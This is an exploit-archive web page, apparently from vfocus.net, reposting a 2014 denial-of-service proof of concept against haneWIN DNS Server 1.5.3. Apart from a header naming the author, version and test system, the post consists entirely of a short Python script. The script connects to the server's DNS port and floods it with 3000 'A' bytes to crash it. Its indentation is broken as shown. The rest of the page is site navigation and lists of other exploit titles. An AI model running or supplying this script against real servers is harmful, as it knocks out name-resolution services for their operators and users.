首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
haneWIN DNS Server 1.5.3 - Denial of Service
来源:vfocus.net 作者:sajith 发布时间:2014-01-20  
###########################################################
[~] Exploit Title: haneWIN DNS Server 1.5.3 - Denial of service
[~] Author: sajith
[~] version: haneWIN DNS Server 1.5.3
[~]Vendor Homepage: http://www.hanewin.net/
[~] vulnerable app link:http://www.hanewin.net/dns-e.htm
[~]Tested in windows Xp sp3
###########################################################
#POC by sajith shetty
import socket
  
target = "127.0.0.1"
port   = 53
  
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
buf = "A" * 3000
request = buf
s.send(request)
data = s.recv(1024)
print data
  
except:
  
print "DNS server is Down!"

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SoapUI 4.6.3 - Remote Code Exe
·MuPDF 1.3 - Stack-based Buffer
·SerComm Device Remote Code Exe
·Ammyy Admin 3.2 Access Bypass
·SerComm Device Remote Code Exe
·ASUS RT-N56U Remote Root
·Ofilter Player 1.1 - (.wav) In
·HP Data Protector Backup Clien
·ACE Stream Media 2.1 - (acestr
·NCH Software Express Burn Plus
·CCProxy 7.3 - Integer Overflow
·MW6 Technologies Aztec ActiveX
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved